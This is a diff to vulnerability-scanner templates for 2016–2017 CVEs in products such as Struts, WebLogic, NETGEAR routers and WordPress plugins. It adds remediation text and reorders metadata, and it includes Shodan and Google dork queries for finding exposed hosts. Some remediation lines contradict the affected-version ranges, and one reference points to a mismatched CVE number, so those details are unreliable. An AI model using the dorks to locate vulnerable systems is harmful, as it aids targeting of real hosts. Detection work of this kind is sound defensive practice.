--- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php. + remediation: | + Upgrade to the latest version of the Brafton WordPress Plugin (version 3.4.9 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/93568433-0b63-4ea7-bbac-4323d3ee0abd - https://nvd.nist.gov/vuln/detail/CVE-2026-10973 @@ -15,14 +17,14 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54186 + cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: brafton product: brafton + framework: wordpress tags: wpscan,cve,cve2016,wordpress,wp,wp-plugin,xss,brafton,authenticated http: diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index da7364a9a1..65a5c49c55 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Apply the latest security patch or update to the ScoreMe Theme to fix the XSS vulnerability. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://wpvulndb.com/vulnerabilities/8431 @@ -15,13 +17,13 @@ info: cve-id: CVE-2016-10993 cwe-id: CWE-79 epss-score: 0.00245 - cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* epss-percentile: 0.61781 + cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: scoreme_project product: scoreme + framework: wordpress tags: cve,cve2016,wordpress,wp-theme,xss http: diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 953d3a48c7..93233c93dc 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - https://nvd.nist.gov/vuln/detail/CVE-2016-1555 @@ -17,8 +19,8 @@ info: cve-id: CVE-2016-1555 cwe-id: CWE-77 epss-score: 0.97375 - cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99856 + cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 64376ca045..b447395a95 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978. + remediation: | + Apply the latest security patches and updates provided by SAP to mitigate the vulnerability. reference: - https://web.archive.org/web/20211209003818/https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/ - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html @@ -17,13 +19,13 @@ info: cve-id: CVE-2016-2389 cwe-id: CWE-22 epss-score: 0.24589 - cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* epss-percentile: 0.96019 + cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-266008933 vendor: sap product: netweaver + shodan-query: http.favicon.hash:-266008933 tags: packetstorm,seclists,lfi,sap,edb,cve,cve2016 http: diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 591133ab7c..48a352841f 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when dynamic method invocation is enabled, allows remote attackers to execute arbitrary code via method: prefix (related to chained expressions). + remediation: | + Upgrade to Apache Struts version 2.3.20.2, 2.3.24.2, or 2.3.28.1. reference: - https://cwiki.apache.org/confluence/display/WW/S2-032 - https://struts.apache.org/docs/s2-032.html @@ -18,8 +20,8 @@ info: cve-id: CVE-2016-3081 cwe-id: CWE-77 epss-score: 0.97524 - cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* epss-percentile: 0.99979 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 5963d56d19..9aaa203602 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -5,6 +5,8 @@ info: author: fq_hsu severity: critical description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application. + remediation: | + Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/40857 - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30 @@ -17,8 +19,8 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* epss-percentile: 0.98024 + cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 3ecd1c1032..d37aacfb59 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: FortiOS Web User Interface in 5.0.x before 5.0.13, 5.2.x before 5.2.3, and 5.4.x before 5.4.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks or cross-site scripting attacks via the "redirect" parameter to "login." + remediation: | + Apply the latest security patches and updates provided by Fortinet to mitigate the vulnerability. reference: - http://www.fortiguard.com/advisory/fortios-open-redirect-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2016-3978 @@ -16,8 +18,8 @@ info: cve-id: CVE-2016-3978 cwe-id: CWE-79 epss-score: 0.00217 - cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* epss-percentile: 0.59005 + cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index b518b0de45..20f11e6cb2 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter. + remediation: | + Upgrade to a patched version of Apache Shiro reference: - https://github.com/Medicean/VulApps/tree/master/s/shiro/1 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4437 @@ -18,8 +20,8 @@ info: cve-id: CVE-2016-4437 cwe-id: CWE-284 epss-score: 0.97507 - cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* epss-percentile: 0.99967 + cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index f2063b4297..baacf4214d 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -5,21 +5,21 @@ info: author: melbadry9,nadino,xElkomy severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 - https://lists.apache.org/thread.html/56c2e7cc9deb1c12a843d0dc251ea7fd3e7e80293cde02fcd65286ba@%3Ccvs.httpd.apache.org%3E - https://lists.apache.org/thread.html/84a3714f0878781f6ed84473d1a503d2cc382277e100450209231830@%3Ccvs.httpd.apache.org%3E - https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E - remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00428 - cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* epss-percentile: 0.71207 + cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index c6a25ac2d4..cd4ac35ff8 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -5,21 +5,21 @@ info: author: princechaddha severity: high description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type. + remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. reference: - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md - https://tanzu.vmware.com/security/cve-2016-4977 - https://nvd.nist.gov/vuln/detail/CVE-2016-4977 - https://pivotal.io/security/cve-2016-4977 - http://www.openwall.com/lists/oss-security/2019/10/16/1 - remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-4977 cwe-id: CWE-19 epss-score: 0.03345 - cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.9012 + cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: pivotal diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index 3c1ed6d7a6..c690d1423a 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -5,6 +5,8 @@ info: author: suman_kar severity: critical description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. + remediation: | + Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2016-5649 - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html @@ -15,8 +17,8 @@ info: cve-id: CVE-2016-5649 cwe-id: CWE-200,CWE-319 epss-score: 0.15681 - cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* epss-percentile: 0.95209 + cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index cc72ea4844..8f1834dda9 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database. + remediation: | + Upgrade to a patched version of vBulletin (4.2.4 or later) or apply the official patch provided by the vendor. reference: - https://www.cvedetails.com/cve/CVE-2016-6195/ - https://www.exploit-db.com/exploits/38489 @@ -18,14 +20,14 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* epss-percentile: 0.64634 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: - max-request: 6 - shodan-query: title:"Powered By vBulletin" verified: "true" + max-request: 6 vendor: vbulletin product: vbulletin + shodan-query: title:"Powered By vBulletin" tags: cve,cve2016,vbulletin,sqli,forum,edb http: diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index 8a1e5608df..a826c76e35 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 @@ -17,8 +19,8 @@ info: cve-id: CVE-2016-6277 cwe-id: CWE-352 epss-score: 0.97471 - cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99942 + cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netgear diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index e5a09e48ae..0b8c45c132 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile. + remediation: | + Upgrade to ZOHO WebNMS Framework version 5.2 SP1 or later to mitigate this vulnerability. reference: - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt - https://www.exploit-db.com/exploits/40229/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2016-6601 cwe-id: CWE-22 epss-score: 0.97518 - cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* epss-percentile: 0.99974 + cpe: cpe:2.3:a:zohocorp:webnms_framework:5.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zohocorp diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 7fbb6197e7..85a381cfe0 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS. + remediation: | + Apply the necessary patch or update provided by Trend Micro to fix the authentication bypass vulnerability. reference: - https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4 - https://nvd.nist.gov/vuln/detail/CVE-2016-7552 @@ -15,8 +17,8 @@ info: cve-id: CVE-2016-7552 cwe-id: CWE-22 epss-score: 0.97004 - cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* epss-percentile: 0.99624 + cpe: cpe:2.3:a:trendmicro:threat_discovery_appliance:2.6.1062:r1:*:*:*:*:*:* metadata: max-request: 1 vendor: trendmicro diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index f1dcd93ffc..5c7fa948d1 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -6,22 +6,22 @@ info: severity: high description: | Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials. + remediation: | + Upgrade to the latest version of the firmware provided by Sony. reference: - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/ - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/ - https://jvn.jp/en/vu/JVNVU96435227/index.html - https://nvd.nist.gov/vuln/detail/CVE-2016-7834 - https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras - remediation: | - Upgrade to the latest version of the firmware provided by Sony. classification: cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00202 - cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.57452 + cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sony diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index c4d77f5496..2111491153 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SPIP 3.1.2 and earlier contains a cross-site scripting vulnerability in valider_xml.php which allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. + remediation: | + Upgrade SPIP to version 3.1.2 or later to mitigate this vulnerability. reference: - https://core.spip.net/projects/spip/repository/revisions/23202 - https://core.spip.net/projects/spip/repository/revisions/23201 @@ -18,8 +20,8 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* epss-percentile: 0.62782 + cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: spip diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index a803999456..418bd7fa36 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Aruba Airwave before version 8.2.3.1 is vulnerable to reflected cross-site scripting. + remediation: | + Upgrade Aruba Airwave to version 8.2.3.1 or later to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/41482 - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt @@ -16,8 +18,8 @@ info: cve-id: CVE-2016-8527 cwe-id: CWE-79 epss-score: 0.00221 - cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* epss-percentile: 0.59489 + cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hp diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index fabf126a62..4b7ad2f80b 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -5,6 +5,8 @@ info: author: charanrayudu,meme-lord severity: high description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. + remediation: | + Upgrade DotNetNuke (DNN) ImageHandler to version 9.2.0 or above. reference: - https://hackerone.com/reports/482634 - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-0929 cwe-id: CWE-918 epss-score: 0.03588 - cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* epss-percentile: 0.90434 + cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dnnsoftware diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index ee5c804854..fd88c77173 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu,daffainfo severity: high description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests. + remediation: | + Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. reference: - https://www.exploit-db.com/exploits/45196 - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822 @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-1000028 cwe-id: CWE-22 epss-score: 0.97522 - cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* epss-percentile: 0.99977 + cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index a84d31f478..ebcbd705c9 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Oracle GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to unauthenticated local file inclusion vulnerabilities that allow remote attackers to request arbitrary files on the server. + remediation: | + Apply the latest patches and updates provided by Oracle to fix the LFI vulnerability in GlassFish Server. reference: - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784 - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037 @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-1000029 cwe-id: CWE-200 epss-score: 0.00387 - cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* epss-percentile: 0.69803 + cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 vendor: oracle diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 5de1c7163c..477dfd6a64 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Phoenix Framework versions 1.0.0 through 1.0.4, 1.1.0 through 1.1.6, 1.2.0, 1.2.2 and 1.3.0-rc.0 contain an open redirect vulnerability, which may result in phishing or social engineering attacks. + remediation: | + Apply the latest security patches or upgrade to a patched version of the Phoenix Framework. reference: - https://elixirforum.com/t/security-releases-for-phoenix/4143 - https://vuldb.com/?id.109587 @@ -15,8 +17,8 @@ info: cve-id: CVE-2017-1000163 cwe-id: CWE-601 epss-score: 0.00151 - cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* epss-percentile: 0.50609 + cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phoenixframework diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 4f47489d9d..9ad45c4d70 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree. + remediation: | + Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor. reference: - https://www.exploit-db.com/exploits/49693 - https://github.com/jqueryfiletree/jqueryfiletree/issues/66 @@ -16,8 +18,8 @@ info: cve-id: CVE-2017-1000170 cwe-id: CWE-22 epss-score: 0.73129 - cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* epss-percentile: 0.97669 + cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jqueryfiletree_project diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 1ec9995271..a9d270e957 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -5,6 +5,8 @@ info: author: Moritz Nentwig severity: critical description: Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution. + remediation: | + Apply the latest security patches or upgrade to a newer version of the Primetek Primefaces application. reference: - https://github.com/mogwailabs/CVE-2017-1000486 - https://github.com/pimps/CVE-2017-1000486 @@ -17,8 +19,8 @@ info: cve-id: CVE-2017-1000486 cwe-id: CWE-326 epss-score: 0.96992 - cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* epss-percentile: 0.99619 + cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: primetek diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 80d7feb4fc..078cf3897b 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site. + remediation: | + Apply the latest security patches provided by Oracle to fix this vulnerability. reference: - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940 @@ -16,14 +18,14 @@ info: cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00409 - cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* epss-percentile: 0.70564 + cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: - max-request: 2 - google-query: inurl:"/cs/idcplg" verified: true + max-request: 2 vendor: oracle product: webcenter_content + google-query: inurl:"/cs/idcplg" tags: cve,cve2017,xss,oracle http: diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 32e30ca263..84e7654a49 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + remediation: | + Apply the latest security patches provided by Oracle to fix this vulnerability. Additionally, restrict network access to the WebLogic server and implement strong authentication mechanisms. reference: - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271 - https://github.com/SuperHacker-liuan/cve-2017-10271-poc @@ -17,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2017-10271 epss-score: 0.97438 - cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* epss-percentile: 0.99911 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index bd4e862694..ae7fc212db 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080. + remediation: | + Upgrade to a patched version of Yaws or apply the necessary security patches. reference: - https://www.exploit-db.com/exploits/42303 - 